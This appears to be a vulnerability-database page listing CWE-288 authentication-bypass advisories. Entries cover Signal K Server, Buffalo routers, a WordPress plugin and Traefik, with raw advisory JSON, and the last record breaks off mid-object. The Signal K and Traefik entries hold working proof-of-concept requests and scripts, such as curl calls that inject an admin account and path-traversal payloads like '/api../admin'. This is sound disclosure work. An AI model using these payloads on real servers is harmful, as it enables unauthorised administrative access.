Common Weakness Enumeration

CWE-288

Allowed

Authentication Bypass Using an Alternate Path or Channel

Abstraction: Base · Status: Incomplete

The product requires authentication, but the product has an alternate path or channel that does not require authentication.

1072 vulnerabilities reference this CWE, most recent first.

GHSA-X8HC-FQV3-7GWF

Vulnerability from github – Published: 2026-04-03 21:37 – Updated: 2026-04-03 21:37
VLAI
Summary
Signal K Server: Privilege Escalation by Admin Role Injection via /enableSecurity
Details

Summary

According to SignalK's security documentation, when a server is first initialized without security enabled, the /skServer/enableSecurity endpoint is intentionally exposed to allow the owner to set up the initial admin account. This initial open access is by design.

However, the critical vulnerability is that this route is never deregistered or disabled after the initial successful setup. Even after the genuine administrator has created their account, restarted the server, and activated token security, the /skServer/enableSecurity route remains perpetually open.

Furthermore, the endpoint explicitly trusts the type field provided in the request body, passing it directly into the server's security configuration without validation. Because the route remains permanently listening, any unauthenticated user can call this endpoint at any time to silently inject a new, fully privileged admin account alongside the legitimate ones.

Vulnerable Root Cause

File: src/serverroutes.ts (Lines 685-754)

if (app.securityStrategy.getUsers(getSecurityConfig(app)).length === 0) {
    app.post(
      `${SERVERROUTESPREFIX}/enableSecurity`,
      (req: Request, res: Response) => {
        // ...
        function addUser(request: Request, response: Response, securityStrategy: SecurityStrategy, config?: any) {
          // [!VULNERABLE] Passes the entire JSON request body directly to the security strategy
          securityStrategy.addUser(config, request.body, (err, theConfig) => {
            // ...
          })
        }
      }
    // ... No code disables or removes this route after first execution.
    // The conditional check on Line 685 only happens during server startup, 

File: src/tokensecurity.ts (Lines 980-994)

function addUser(
    theConfig: SecurityConfig,
    user: { userId: string; type: string; password?: string },
    callback: ICallback<SecurityConfig>
  ): void {
    // ...
    const newUser: User = {
      username: user.userId,
      type: user.type // [!VULNERABLE] Blindly trusts the injected "type" field
    }

Proof of Concept (PoC)

Simulate Legitimate Initial Setup: Send a POST request to the open enableSecurity route defining the initial legitimate admin account.

curl -X POST http://localhost:3000/skServer/enableSecurity \
  -H "Content-Type: application/json" \
  -d '{"userId": "admin", "password": "securepassword", "type": "admin"}'

Result: Security enabled

Inject Malicious Admin: Send the exact same request again to create a second, unauthorized admin account. This should ideally be blocked because security was already enabled.

curl -X POST http://localhost:3000/skServer/enableSecurity \
  -H "Content-Type: application/json" \
  -d '{"userId": "attacker", "password": "password123", "type": "admin"}'

Result: Security enabled (The vulnerability: The server fails to reject the request and creates the second admin).

Verify Both Admins Exist: Login via JWT as the attacker and query the restricted users endpoint.

# Get Token for Attacker
TOKEN=$(curl -s -X POST http://localhost:3000/signalk/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "attacker", "password": "password123"}' | jq -r .token)
# Access Admin-Only Data
curl -H "Authorization: Bearer $TOKEN" http://localhost:3000/skServer/security/users
Result: The system returns both admin and attacker as active Administrators.

Screenshot 2026-03-24 145906

Security Impact

An unauthenticated attacker can gain full Administrator access to the SignalK server at any time, allowing them to modify sensitive vessel routing data, alter server configurations, and access restricted endpoints

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "signalk-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.24.0-beta.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33950"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-288",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T21:37:19Z",
    "nvd_published_at": "2026-04-02T17:16:22Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nAccording to SignalK\u0027s security documentation, when a server is first initialized without security enabled, the **/skServer/enableSecurity** endpoint is intentionally exposed to allow the owner to set up the initial admin account. This initial open access is by design.\n\nHowever, the critical vulnerability is that this route is never deregistered or disabled after the initial successful setup. Even after the genuine administrator has created their account, restarted the server, and activated token security, the **/skServer/enableSecurity** route remains perpetually open.\n\nFurthermore, the endpoint explicitly trusts the **type** field provided in the request body, passing it directly into the server\u0027s security configuration without validation. Because the route remains permanently listening, any unauthenticated user can call this endpoint at any time to silently inject a new, fully privileged admin account alongside the legitimate ones.\n\n## Vulnerable Root Cause \n\nFile:  src/serverroutes.ts (Lines 685-754)\n```\nif (app.securityStrategy.getUsers(getSecurityConfig(app)).length === 0) {\n    app.post(\n      `${SERVERROUTESPREFIX}/enableSecurity`,\n      (req: Request, res: Response) =\u003e {\n        // ...\n        function addUser(request: Request, response: Response, securityStrategy: SecurityStrategy, config?: any) {\n          // [!VULNERABLE] Passes the entire JSON request body directly to the security strategy\n          securityStrategy.addUser(config, request.body, (err, theConfig) =\u003e {\n            // ...\n          })\n        }\n      }\n    // ... No code disables or removes this route after first execution.\n    // The conditional check on Line 685 only happens during server startup, \n```\n\nFile: src/tokensecurity.ts (Lines 980-994)\n```\nfunction addUser(\n    theConfig: SecurityConfig,\n    user: { userId: string; type: string; password?: string },\n    callback: ICallback\u003cSecurityConfig\u003e\n  ): void {\n    // ...\n    const newUser: User = {\n      username: user.userId,\n      type: user.type // [!VULNERABLE] Blindly trusts the injected \"type\" field\n    }\n```\n\n## Proof of Concept (PoC)\n\n**Simulate Legitimate Initial Setup**: Send a POST request to the open enableSecurity route defining the initial legitimate admin account.\n```\ncurl -X POST http://localhost:3000/skServer/enableSecurity \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"userId\": \"admin\", \"password\": \"securepassword\", \"type\": \"admin\"}\u0027\n\nResult: Security enabled\n```\n\n**Inject Malicious Admin**: Send the exact same request again to create a second, unauthorized admin account. This should ideally be blocked because security was already enabled.\n\n```\ncurl -X POST http://localhost:3000/skServer/enableSecurity \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"userId\": \"attacker\", \"password\": \"password123\", \"type\": \"admin\"}\u0027\n\nResult: Security enabled (The vulnerability: The server fails to reject the request and creates the second admin).\n```\n\n**Verify Both Admins Exist**: Login via JWT as the attacker and query the restricted users endpoint.\n\n```\n# Get Token for Attacker\nTOKEN=$(curl -s -X POST http://localhost:3000/signalk/v1/auth/login \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"username\": \"attacker\", \"password\": \"password123\"}\u0027 | jq -r .token)\n```\n```\n# Access Admin-Only Data\ncurl -H \"Authorization: Bearer $TOKEN\" http://localhost:3000/skServer/security/users\nResult: The system returns both admin and attacker as active Administrators.\n```\n\n\u003cimg width=\"1205\" height=\"469\" alt=\"Screenshot 2026-03-24 145906\" src=\"https://github.com/user-attachments/assets/98855e54-cb78-4786-a9e3-63dcc1bed37a\" /\u003e\n\n## Security Impact\nAn unauthenticated attacker can gain full Administrator access to the SignalK server at any time, allowing them to modify sensitive vessel routing data, alter server configurations, and access restricted endpoints",
  "id": "GHSA-x8hc-fqv3-7gwf",
  "modified": "2026-04-03T21:37:19Z",
  "published": "2026-04-03T21:37:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-x8hc-fqv3-7gwf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33950"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SignalK/signalk-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Signal K Server: Privilege Escalation by Admin Role Injection via /enableSecurity "
}

GHSA-X9GR-C22H-6MQF

Vulnerability from github – Published: 2026-03-27 06:31 – Updated: 2026-03-27 06:31
VLAI
Details

Authentication bypass issue exists in BUFFALO Wi-Fi router products, which may allow an attacker to alter critical configuration settings without authentication.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-32678"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-27T06:16:38Z",
    "severity": "HIGH"
  },
  "details": "Authentication bypass issue exists in BUFFALO Wi-Fi router products, which may allow an attacker to alter critical configuration settings without authentication.",
  "id": "GHSA-x9gr-c22h-6mqf",
  "modified": "2026-03-27T06:31:43Z",
  "published": "2026-03-27T06:31:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32678"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN83788689"
    },
    {
      "type": "WEB",
      "url": "https://www.buffalo.jp/news/detail/20260323-01.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-X9JQ-WH6C-XG75

Vulnerability from github – Published: 2025-02-25 15:34 – Updated: 2026-04-23 15:35
VLAI
Details

Authentication Bypass Using an Alternate Path or Channel vulnerability in Aldo Latino PrivateContent. This issue affects PrivateContent: from n/a through 8.11.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-26966"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-25T15:15:29Z",
    "severity": "CRITICAL"
  },
  "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Aldo Latino PrivateContent. This issue affects PrivateContent: from n/a through 8.11.5.",
  "id": "GHSA-x9jq-wh6c-xg75",
  "modified": "2026-04-23T15:35:54Z",
  "published": "2025-02-25T15:34:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26966"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/private-content/vulnerability/wordpress-privatecontent-plugin-8-11-5-unauthenticated-account-takeover-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XF64-8MW2-4GR2

Vulnerability from github – Published: 2026-06-11 13:26 – Updated: 2026-06-11 13:26
VLAI
Summary
Traefik has a StripPrefix Route-Level Auth Bypass via Path Normalization
Details

Summary

There is a high severity vulnerability in Traefik's StripPrefix middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a PathPrefix rule and applies the StripPrefix middleware, a request path containing .. or its percent-encoded form %2e%2e can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths — such as admin or internal configuration endpoints — without satisfying the authentication middleware attached to the protected router.

Patches

  • https://github.com/traefik/traefik/releases/tag/v2.11.48
  • https://github.com/traefik/traefik/releases/tag/v3.6.19
  • https://github.com/traefik/traefik/releases/tag/v3.7.3

For more information

If there are any questions or comments about this advisory, please open an issue.

Original Description # Traefik StripPrefix Route-Level Auth Bypass via Path Normalization (/api../) ## Summary A route-level authentication/authorization bypas was found in Traefik when `PathPrefix`-based public routes are combined with `StripPrefix`. A request using `/api../` or `/api%2e%2e/` can avoid protected router rules at the routing stage, but after `StripPrefix`, the path is normalized and forwarded to the backend as a protected path such as `/admin` or `/internal/config`. This is reproducible on patched/latest Traefik versions and appears related to, but distinct from, previously disclosed `StripPrefixRegex` / path-normalization issues. This report specifically affects `StripPrefix`. ## Affected Versions Tested | Image | Observed Version | Result | |---|---|---| | `traefik:v2.11` | `v2.11.46` | Affected | | `traefik:v3.6` | `v3.6.17` | Affected | | `traefik:latest` | `v3.7.1` | Affected | ### Lab Contrast | Image | Result | |---|---| | `traefik:v2.10` | Not reproduced in lab | | `traefik:v3.5` | Not reproduced in lab | ## Vulnerable Configuration Pattern The issue appears when: - a broad public route strips a prefix - while a separate protected route is intended to guard internal/admin paths
http:
  routers:
    public-api:
      rule: 'PathPrefix(`/api`) && !PathPrefix(`/api/admin`) && !PathPrefix(`/api/internal`)'
      entryPoints:
        - web
      middlewares:
        - strip-api
      service: backend

    protected:
      rule: 'PathPrefix(`/admin`) || PathPrefix(`/internal`)'
      entryPoints:
        - web
      middlewares:
        - auth
      service: backend

  middlewares:
    strip-api:
      stripPrefix:
        prefixes:
          - /api

    auth:
      basicAuth:
        users:
          - 'test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/'

  services:
    backend:
      loadBalancer:
        servers:
          - url: http://backend:9000
## Observed Behavior ### Direct Protected Paths These are correctly blocked. | Request | Expected | Observed | |---|---|---| | `GET /admin` | Blocked | `401` | | `GET /internal/config` | Blocked | `401` | ### Expected Public Exclusions These do not expose protected backend paths. | Request | Expected | Observed | |---|---|---| | `GET /api/admin` | Not routed to protected backend path | `404` | | `GET /api/internal/config` | Not routed to protected backend path | `404` | ### Bypass Payloads These reach protected backend paths. | Request | Observed Status | Backend Receives | |---|---|---| | `GET /api../admin` | `200` | `/admin` | | `GET /api%2e%2e/admin` | `200` | `/admin` | | `GET /api../internal/config` | `200` | `/internal/config` | | `GET /api%2e%2e/internal/config` | `200` | `/internal/config` | ## Minimal PoC ### docker-compose.yml
services:
  traefik:
    image: traefik:v3.7
    command:
      - --providers.file.filename=/etc/traefik/dynamic.yml
      - --entrypoints.web.address=:8080
      - --accesslog=true
    ports:
      - "127.0.0.1:18080:8080"
    volumes:
      - ./dynamic.yml:/etc/traefik/dynamic.yml:ro
    depends_on:
      - backend

  backend:
    image: python:3.12-slim
    working_dir: /app
    command: python backend.py
    volumes:
      - ./backend.py:/app/backend.py:ro
    expose:
      - "9000"
### dynamic.yml
http:
  routers:
    public-api:
      rule: 'PathPrefix(`/api`) && !PathPrefix(`/api/admin`) && !PathPrefix(`/api/internal`)'
      entryPoints:
        - web
      middlewares:
        - strip-api
      service: backend

    protected:
      rule: 'PathPrefix(`/admin`) || PathPrefix(`/internal`)'
      entryPoints:
        - web
      middlewares:
        - auth
      service: backend

  middlewares:
    strip-api:
      stripPrefix:
        prefixes:
          - /api

    auth:
      basicAuth:
        users:
          - 'test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/'

  services:
    backend:
      loadBalancer:
        servers:
          - url: http://backend:9000
### backend.py
from http.server import BaseHTTPRequestHandler, HTTPServer
import json

class Handler(BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):
        return

    def _json(self, status, obj):
        body = json.dumps(obj).encode()
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        if self.path == "/admin":
            self._json(200, {
                "seen_path": self.path,
                "secret": "ADMIN_SECRET_REACHED"
            })
        elif self.path == "/internal/config":
            self._json(200, {
                "seen_path": self.path,
                "secret": "TRAEFIK_LAB_INTERNAL_CONFIG"
            })
        elif self.path == "/admin/exec":
            self._json(200, {
                "seen_path": self.path,
                "rce_chain_marker": True,
                "note": "protected execution endpoint reached"
            })
        else:
            self._json(404, {
                "seen_path": self.path,
                "secret": None
            })

HTTPServer(("0.0.0.0", 9000), Handler).serve_forever()
### poc.py
#!/usr/bin/env python3
from urllib.request import Request, urlopen
from urllib.error import HTTPError

BASE = "http://127.0.0.1:18080"

PATHS = [
    "/admin",
    "/internal/config",
    "/api/admin",
    "/api/internal/config",
    "/api../admin",
    "/api%2e%2e/admin",
    "/api../internal/config",
    "/api%2e%2e/internal/config",
    "/admin/exec",
    "/api/admin/exec",
    "/api../admin/exec",
    "/api%2e%2e/admin/exec",
]

for path in PATHS:
    req = Request(BASE + path)
    try:
        with urlopen(req, timeout=5) as r:
            status = r.status
            body = r.read().decode(errors="replace")
    except HTTPError as e:
        status = e.code
        body = e.read().decode(errors="replace")

    print(f"{path:28} {status} {body[:180]}")
### Run
docker compose up -d
python3 poc.py
## Expected Vulnerable Output
/admin                       401
/internal/config             401
/api/admin                   404
/api/internal/config         404
/api../admin                 200  backend seen_path=/admin
/api%2e%2e/admin             200  backend seen_path=/admin
/api../internal/config       200  backend seen_path=/internal/config
/api%2e%2e/internal/config   200  backend seen_path=/internal/config
/api../admin/exec            200  protected execution endpoint reached
/api%2e%2e/admin/exec        200  protected execution endpoint reached
## Root Cause Hypothesis The vulnerable behavior appears to be caused by path normalization after prefix stripping.
Incoming path:              /api../admin
After StripPrefix("/api"):  /../admin
After JoinPath():           /admin
The request does not match the protected `/admin` router at the routing stage, but the backend receives `/admin` after normalization. The relevant behavior appears related to `StripPrefix` calling `req.URL.JoinPath()` after removing the prefix in newer versions. ## Security Impact An unauthenticated network attacker can bypass intended Traefik route-level authentication/authorization boundaries and access backend paths that the operator intended to protect with a separate protected router. Potential impact includes: - Access to protected admin paths - Access to internal configuration endpoints - Exposure of secrets returned by internal backends - Access to protected backend management functionality - Conditional RCE if the protected backend exposes an execution primitive In the local lab, a protected `/admin/exec` endpoint was reachable through `/api../admin/exec`, demonstrating a conditional RCE chain when the backend contains an execution primitive. This is not a standalone Traefik RCE claim. It is an authentication/authorization boundary bypass that can expose protected backend functionality. ## Suggested Severity Suggested CVSS is **10.0 Critical** with Scope Changed, because the bypass crosses the Traefik route-level authorization boundary and exposes protected backend functionality.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
Scope Changed was selected because the request bypasses Traefik's route-level authorization boundary and reaches backend paths that are intended to be protected by a separate authenticated router. If the vendor treats Traefik and the backend as the same security scope, the score may be interpreted as **9.1 Critical** with Scope Unchanged:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
The issue was submitted with the stronger Scope Changed interpretation, but the maintainers may adjust the final CVSS score during triage. ## Weakness Primary CWE: - `CWE-863: Incorrect Authorization` Related weakness candidates: - `CWE-180: Incorrect Behavior Order: Validate Before Canonicalize` - `CWE-22: Improper Limitation of a Pathname to a Restricted Directory` ## Mitigation Verified in Lab The bypass was blocked when using a stricter prefix boundary:
PathRegexp(`^/api(/|$)`)
or:
PathPrefix(`/api/`) with StripPrefix(`/api/`)
## Relation to Existing Advisories This appears related to the same vulnerability family as prior Traefik path normalization / `StripPrefixRegex` bypass advisories, but it affects `StripPrefix` and remains reproducible on patched/latest versions tested above. This was reported as a possible incomplete fix or bypass variant rather than assuming it is a duplicate. ## Reporter WonYun / kyun0
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.11.48"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.6.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/traefik/traefik/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.7.0-ea.1"
            },
            {
              "fixed": "3.7.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48020"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-11T13:26:57Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThere is a high severity vulnerability in Traefik\u0027s `StripPrefix` middleware that allows an unauthenticated attacker to bypass route-level authentication and authorization. When a public router matches on a `PathPrefix` rule and applies the `StripPrefix` middleware, a request path containing `..` or its percent-encoded form `%2e%2e` can match the public route at routing time and then, after the prefix is stripped and the path is normalized, resolve to a path served by a separate, authenticated router. As a result, an attacker can reach protected backend paths \u2014 such as admin or internal configuration endpoints \u2014 without satisfying the authentication middleware attached to the protected router.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.48\n- https://github.com/traefik/traefik/releases/tag/v3.6.19\n- https://github.com/traefik/traefik/releases/tag/v3.7.3\n\n## For more information\n\nIf there are any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n\u003cdetails\u003e\n\u003csummary\u003eOriginal Description\u003c/summary\u003e\n\n# Traefik StripPrefix Route-Level Auth Bypass via Path Normalization (/api../)\n\n## Summary\n\nA route-level authentication/authorization bypas was found in Traefik when `PathPrefix`-based public routes are combined with `StripPrefix`.\n\nA request using `/api../` or `/api%2e%2e/` can avoid protected router rules at the routing stage, but after `StripPrefix`, the path is normalized and forwarded to the backend as a protected path such as `/admin` or `/internal/config`.\n\nThis is reproducible on patched/latest Traefik versions and appears related to, but distinct from, previously disclosed `StripPrefixRegex` / path-normalization issues.\n\nThis report specifically affects `StripPrefix`.\n\n## Affected Versions Tested\n\n| Image | Observed Version | Result |\n|---|---|---|\n| `traefik:v2.11` | `v2.11.46` | Affected |\n| `traefik:v3.6` | `v3.6.17` | Affected |\n| `traefik:latest` | `v3.7.1` | Affected |\n\n### Lab Contrast\n\n| Image | Result |\n|---|---|\n| `traefik:v2.10` | Not reproduced in lab |\n| `traefik:v3.5` | Not reproduced in lab |\n\n## Vulnerable Configuration Pattern\n\nThe issue appears when:\n\n- a broad public route strips a prefix\n- while a separate protected route is intended to guard internal/admin paths\n\n```yaml\nhttp:\n  routers:\n    public-api:\n      rule: \u0027PathPrefix(`/api`) \u0026\u0026 !PathPrefix(`/api/admin`) \u0026\u0026 !PathPrefix(`/api/internal`)\u0027\n      entryPoints:\n        - web\n      middlewares:\n        - strip-api\n      service: backend\n\n    protected:\n      rule: \u0027PathPrefix(`/admin`) || PathPrefix(`/internal`)\u0027\n      entryPoints:\n        - web\n      middlewares:\n        - auth\n      service: backend\n\n  middlewares:\n    strip-api:\n      stripPrefix:\n        prefixes:\n          - /api\n\n    auth:\n      basicAuth:\n        users:\n          - \u0027test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/\u0027\n\n  services:\n    backend:\n      loadBalancer:\n        servers:\n          - url: http://backend:9000\n```\n\n## Observed Behavior\n\n### Direct Protected Paths\n\nThese are correctly blocked.\n\n| Request | Expected | Observed |\n|---|---|---|\n| `GET /admin` | Blocked | `401` |\n| `GET /internal/config` | Blocked | `401` |\n\n### Expected Public Exclusions\n\nThese do not expose protected backend paths.\n\n| Request | Expected | Observed |\n|---|---|---|\n| `GET /api/admin` | Not routed to protected backend path | `404` |\n| `GET /api/internal/config` | Not routed to protected backend path | `404` |\n\n### Bypass Payloads\n\nThese reach protected backend paths.\n\n| Request | Observed Status | Backend Receives |\n|---|---|---|\n| `GET /api../admin` | `200` | `/admin` |\n| `GET /api%2e%2e/admin` | `200` | `/admin` |\n| `GET /api../internal/config` | `200` | `/internal/config` |\n| `GET /api%2e%2e/internal/config` | `200` | `/internal/config` |\n\n## Minimal PoC\n\n### docker-compose.yml\n\n```yaml\nservices:\n  traefik:\n    image: traefik:v3.7\n    command:\n      - --providers.file.filename=/etc/traefik/dynamic.yml\n      - --entrypoints.web.address=:8080\n      - --accesslog=true\n    ports:\n      - \"127.0.0.1:18080:8080\"\n    volumes:\n      - ./dynamic.yml:/etc/traefik/dynamic.yml:ro\n    depends_on:\n      - backend\n\n  backend:\n    image: python:3.12-slim\n    working_dir: /app\n    command: python backend.py\n    volumes:\n      - ./backend.py:/app/backend.py:ro\n    expose:\n      - \"9000\"\n```\n\n### dynamic.yml\n\n```yaml\nhttp:\n  routers:\n    public-api:\n      rule: \u0027PathPrefix(`/api`) \u0026\u0026 !PathPrefix(`/api/admin`) \u0026\u0026 !PathPrefix(`/api/internal`)\u0027\n      entryPoints:\n        - web\n      middlewares:\n        - strip-api\n      service: backend\n\n    protected:\n      rule: \u0027PathPrefix(`/admin`) || PathPrefix(`/internal`)\u0027\n      entryPoints:\n        - web\n      middlewares:\n        - auth\n      service: backend\n\n  middlewares:\n    strip-api:\n      stripPrefix:\n        prefixes:\n          - /api\n\n    auth:\n      basicAuth:\n        users:\n          - \u0027test:$apr1$H6uskkkW$IgXLP6ewTrSuBkTrqE8wj/\u0027\n\n  services:\n    backend:\n      loadBalancer:\n        servers:\n          - url: http://backend:9000\n```\n\n### backend.py\n\n```python\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport json\n\nclass Handler(BaseHTTPRequestHandler):\n    def log_message(self, fmt, *args):\n        return\n\n    def _json(self, status, obj):\n        body = json.dumps(obj).encode()\n        self.send_response(status)\n        self.send_header(\"Content-Type\", \"application/json\")\n        self.send_header(\"Content-Length\", str(len(body)))\n        self.end_headers()\n        self.wfile.write(body)\n\n    def do_GET(self):\n        if self.path == \"/admin\":\n            self._json(200, {\n                \"seen_path\": self.path,\n                \"secret\": \"ADMIN_SECRET_REACHED\"\n            })\n        elif self.path == \"/internal/config\":\n            self._json(200, {\n                \"seen_path\": self.path,\n                \"secret\": \"TRAEFIK_LAB_INTERNAL_CONFIG\"\n            })\n        elif self.path == \"/admin/exec\":\n            self._json(200, {\n                \"seen_path\": self.path,\n                \"rce_chain_marker\": True,\n                \"note\": \"protected execution endpoint reached\"\n            })\n        else:\n            self._json(404, {\n                \"seen_path\": self.path,\n                \"secret\": None\n            })\n\nHTTPServer((\"0.0.0.0\", 9000), Handler).serve_forever()\n```\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError\n\nBASE = \"http://127.0.0.1:18080\"\n\nPATHS = [\n    \"/admin\",\n    \"/internal/config\",\n    \"/api/admin\",\n    \"/api/internal/config\",\n    \"/api../admin\",\n    \"/api%2e%2e/admin\",\n    \"/api../internal/config\",\n    \"/api%2e%2e/internal/config\",\n    \"/admin/exec\",\n    \"/api/admin/exec\",\n    \"/api../admin/exec\",\n    \"/api%2e%2e/admin/exec\",\n]\n\nfor path in PATHS:\n    req = Request(BASE + path)\n    try:\n        with urlopen(req, timeout=5) as r:\n            status = r.status\n            body = r.read().decode(errors=\"replace\")\n    except HTTPError as e:\n        status = e.code\n        body = e.read().decode(errors=\"replace\")\n\n    print(f\"{path:28} {status} {body[:180]}\")\n```\n\n### Run\n\n```bash\ndocker compose up -d\npython3 poc.py\n```\n\n## Expected Vulnerable Output\n\n```text\n/admin                       401\n/internal/config             401\n/api/admin                   404\n/api/internal/config         404\n/api../admin                 200  backend seen_path=/admin\n/api%2e%2e/admin             200  backend seen_path=/admin\n/api../internal/config       200  backend seen_path=/internal/config\n/api%2e%2e/internal/config   200  backend seen_path=/internal/config\n/api../admin/exec            200  protected execution endpoint reached\n/api%2e%2e/admin/exec        200  protected execution endpoint reached\n```\n\n## Root Cause Hypothesis\n\nThe vulnerable behavior appears to be caused by path normalization after prefix stripping.\n\n```text\nIncoming path:              /api../admin\nAfter StripPrefix(\"/api\"):  /../admin\nAfter JoinPath():           /admin\n```\n\nThe request does not match the protected `/admin` router at the routing stage, but the backend receives `/admin` after normalization.\n\nThe relevant behavior appears related to `StripPrefix` calling `req.URL.JoinPath()` after removing the prefix in newer versions.\n\n## Security Impact\n\nAn unauthenticated network attacker can bypass intended Traefik route-level authentication/authorization boundaries and access backend paths that the operator intended to protect with a separate protected router.\n\nPotential impact includes:\n\n- Access to protected admin paths\n- Access to internal configuration endpoints\n- Exposure of secrets returned by internal backends\n- Access to protected backend management functionality\n- Conditional RCE if the protected backend exposes an execution primitive\n\nIn the local lab, a protected `/admin/exec` endpoint was reachable through `/api../admin/exec`, demonstrating a conditional RCE chain when the backend contains an execution primitive.\n\nThis is not a standalone Traefik RCE claim. It is an authentication/authorization boundary bypass that can expose protected backend functionality.\n\n## Suggested Severity\n\nSuggested CVSS is **10.0 Critical** with Scope Changed, because the bypass crosses the Traefik route-level authorization boundary and exposes protected backend functionality.\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n```\n\nScope Changed was selected because the request bypasses Traefik\u0027s route-level authorization boundary and reaches backend paths that are intended to be protected by a separate authenticated router.\n\nIf the vendor treats Traefik and the backend as the same security scope, the score may be interpreted as **9.1 Critical** with Scope Unchanged:\n\n```text\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n```\n\nThe issue was submitted with the stronger Scope Changed interpretation, but the maintainers may adjust the final CVSS score during triage.\n\n## Weakness\n\nPrimary CWE:\n\n- `CWE-863: Incorrect Authorization`\n\nRelated weakness candidates:\n\n- `CWE-180: Incorrect Behavior Order: Validate Before Canonicalize`\n- `CWE-22: Improper Limitation of a Pathname to a Restricted Directory`\n\n## Mitigation Verified in Lab\n\nThe bypass was blocked when using a stricter prefix boundary:\n\n```text\nPathRegexp(`^/api(/|$)`)\n```\n\nor:\n\n```text\nPathPrefix(`/api/`) with StripPrefix(`/api/`)\n```\n\n## Relation to Existing Advisories\n\nThis appears related to the same vulnerability family as prior Traefik path normalization / `StripPrefixRegex` bypass advisories, but it affects `StripPrefix` and remains reproducible on patched/latest versions tested above.\n\nThis was reported as a possible incomplete fix or bypass variant rather than assuming it is a duplicate.\n\n## Reporter\n\nWonYun / kyun0\n\n\u003c/details\u003e",
